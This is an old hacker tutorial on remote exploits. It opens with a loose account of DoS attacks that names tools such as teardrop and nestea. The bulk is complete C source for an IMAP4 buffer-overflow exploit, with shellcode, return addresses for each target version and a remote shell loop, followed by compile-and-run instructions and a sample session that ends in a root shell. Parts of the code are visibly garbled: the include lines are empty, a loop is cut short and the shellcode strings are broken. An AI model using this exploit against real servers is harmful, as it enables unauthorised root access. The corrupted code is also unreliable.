Techniques and remote exploits

[Don_SyStEmS]

Techniques & Remote Exploits.
================================================== =============================

Remote exploits works in a way so you execute a program on your computer,
that program sends something to the other computer, exploiting a vunerebilety
and giving you access to the remote operating system.

The phf trick which I talked about in the beginning, uses a bug in the
remote system to gain information that you normally wouldent be allowed to get.

An exploit doesn't have to give you access to computer thought,
a DoS (Denial of Service) attack is also a form of exploit, the most simple
way of performing a DoS attack is to send oversized fragmented ICMP pings
that causes windows (95) to crash.
The most well known DoS attack programs that uses that are 'teardrop',
'nestea' and 'nestea2'.
What happens is, when the Windows computer gets the oversized fragmented ping
it doesn't know really what to do with it, so it takes alot of CPU time
to process it, and if you send several of those in a `flood` the system
totally locks up.
This is atleast what I have heard is happening, but don't take that as any
absolute fact, I have not read the source code for any of those DoS attacks,
so and I have not really read about flooding all that much...
Flooding as flooding is just to send so many pings that the remote modem
can't handle it and shuts down, or atleast gets lagged, anyway flooding
is lame and you will end up in the remote computers logs if they log...
And since DoS attacks and Flooding is illegal, that is not a good idea.

-------------------------------------------------------------------------------
Note: lag / lagging, is another word for long/bad ping times. The time it takes
from when you send a request to a remote computer until it responds and
it get back to your computer.
-------------------------------------------------------------------------------

Now let's take a look at a real remote exploit and about what it does,
this exploit works for imap versions:

IMAP4rev1 9.0
IMAP4rev1 v10.190
IMAP4rev1 v10.223
IMAP4rev1 v10.203
IMAP4 Service 8.3

So here we go:

================================================== =============================
Here follows the exploit source code exactly as I got it from bugtraq.
================================================== =============================

/* Ultimate IMAP4 sploit coded by The Tekneeq Crew */
/* http://www.attrition.org/hosted/tekneeq */

#include
#include
#include
#include
#include
#include
#include

#define RET_POS 1028

int connect_tcp(struct in_addr addr,unsigned short port);
int fdprintf(int dafd,char *fmt,...);
void RunShell(int thesock);

struct types {
char *name;
unsigned long ret_addr;
};

struct types types[]={
{"IMAP4rev1 9.0",0xbffff6e4},
{"IMAP4rev1 v10.190",0xbffff30f},
{"IMAP4rev1 v10.223",0xbffff6e4},
{"IMAP4rev1 v10.203",0xbffff30f},
{"IMAP4 Service 8.3",0xbffff724},
{NULL,0}
};

char overflow_buff[4096];
struct in_addr victim;

/* standard shellcode with a few modifications */
char hellcode[]=
"\xeb\x35\x5e\x80\x46\x01\x30\x80\x46\x02\x30\x80\ x46\x03\x30"
"\x80\x46\x05\x30\x80\x46\x06\x30\x89\xf0\x89\x46\ x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\ x08\x8d\x56"
"\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xc6\ xff\xff\xff"
"\x2f\x32\x39\x3e\x2f\x43\x38";

int main (int argc,char **argv)
{
unsigned long *ret;
char recvbuf[1024];
int sockfd;
int i,n=0;

if (argc < 2)
{
printf("Usage: %s [offset]\n",argv[0]);
exit(0);
}

if (!host_to_ip(argv[1],&victim))
{
fprintf(stderr,"Hostname lookup failure\n");
exit(0);
}

memset(overflow_buff,0x90,4096);
for (i=RET_POS-(strlen(hellcode));i< 0)
{
fprintf(stderr,"Error connecting to remote host\n");
exit(0);
}
n=read(sockfd,recvbuf,1024);
if (n <= 0) {
fprintf(stderr,"Connection closed\n");
exit(0);
}
printf("%s\n",recvbuf);
for (i=0;;i++)
{
if (types[i].name==NULL)
{
i=0;
break;
}
if (strstr(recvbuf,types[i].name))
break;
}
printf("Imap type %d\n",i);
ret=(unsigned long *)(overflow_buff+RET_POS);
*ret=types[i].ret_addr;
if (argv[2]) *ret+=(unsigned long)atoi(argv[2]);
overflow_buff[RET_POS+4]=0;
printf("Sending overflow\n");
fdprintf(sockfd,"* AUTHENTICATE {%d}\n",strlen(overflow_buff));
fdprintf(sockfd,"%s\r\n",overflow_buff);
read(sockfd,recvbuf,1024);
printf("Got shell\n");
RunShell(sockfd);
close(sockfd);
return;
}

void RunShell(int thesock)
{
int n;
char recvbuf[1024];
fd_set rset;

while (1)
{
FD_ZERO(&rset);
FD_SET(thesock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(thesock+1,&rset,NULL,NULL,NULL);
if (FD_ISSET(thesock,&rset))
{
n=read(thesock,recvbuf,1024);
if (n <= 0)
{
printf("Connection closed\n");
exit(0);
}
recvbuf[n]=0;
printf("%s",recvbuf);
}
if (FD_ISSET(STDIN_FILENO,&rset))
{
n=read(STDIN_FILENO,recvbuf,1024);
if (n>0)
{
recvbuf[n]=0;
write(thesock,recvbuf,n);
}
}
}
}

int fdprintf(int dafd,char *fmt,...)
{
char mybuffer[4096];
va_list va;

va_start(va,fmt);
vsnprintf(mybuffer,4096,fmt,va);
write(dafd,mybuffer,strlen(mybuffer));
va_end(va);
return(1);
}

int connect_tcp(struct in_addr addr,unsigned short port)
{
struct sockaddr_in serv;
int thesock,flags;

thesock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
bzero(&serv,sizeof(serv));
memcpy(&serv.sin_addr,&addr,sizeof(struct in_addr));
serv.sin_port=htons(port);
serv.sin_family=AF_INET;
if (connect(thesock,(struct sockaddr *)&serv,sizeof(serv)) < 0)
return(-1);
else
return(thesock);
}

int host_to_ip(char *hostname,struct in_addr *addr)
{
struct hostent *res;

res=gethostbyname(hostname);
if (res==NULL)
return(0);
memcpy((char *)addr,res->h_addr,res->h_length);
return(1);
}

================================================== =============================
Note: since this is not a socks coding tutorial I wont really go into what
every line in this exploit does, but I will cover it in whole.
================================================== =============================

To make this work:
Cut away what comes before "#include " and after the last "}",
name is something like "imapx.c" then compile it, like this:

gcc -o imapx imapx.c

then ./imapx ...... as this following example:

-------------------------------------------------------------------------------

[user@localhost user]$ gcc -o imapx imapx.c
[user@localhost user]$ ./imapx 127.0.0.1
* OK
localhost.localdomain IMAP4rev1 Service 9.0(157) at Thu, 6 Jan 2000 07:33:39 +0900 (JST) (Report problems in this server to MRC@CAC.Washington.EDU)

Imap type 0
Sending overflow
Got shell
whoami
root
exit

Connection closed by foreign host.
[user@localhost user]$

-------------------------------------------------------------------------------

[user@localhost user]$ gcc -o imapx imapx.c <<== Compiling the exploit.
[user@localhost user]$ ./imapx 127.0.0.1 <<== Executing it on myself.
*OK <<== Connected to host.

localhost.localdomain IMAP4rev1 Service 9.0(157) at Thu, 6 Jan 2000 07:33:39 +0900 (JST) [and more] <<== Server name, imap version, date, and so on.

Imap type 0 <<== This is the exploits internal type of the imap version.
Sending overflow <<== Does what it says, sending the actual exploit.
Got shell <<== means it's ready, you are in the remote computer.
whoami <<== User input (this is the first command I send)
root <<== Answer from the computer, I am in as root.
exit <<== I exit the shell, and out of the remote computer.

Connection closed by foreign host. <<== Is what is says it is.
[user@localhost user]$ <<== Back in my own computer.


--------
Tested by Don on his 800mhZ computer xD
works
written by Cloudy for Cdir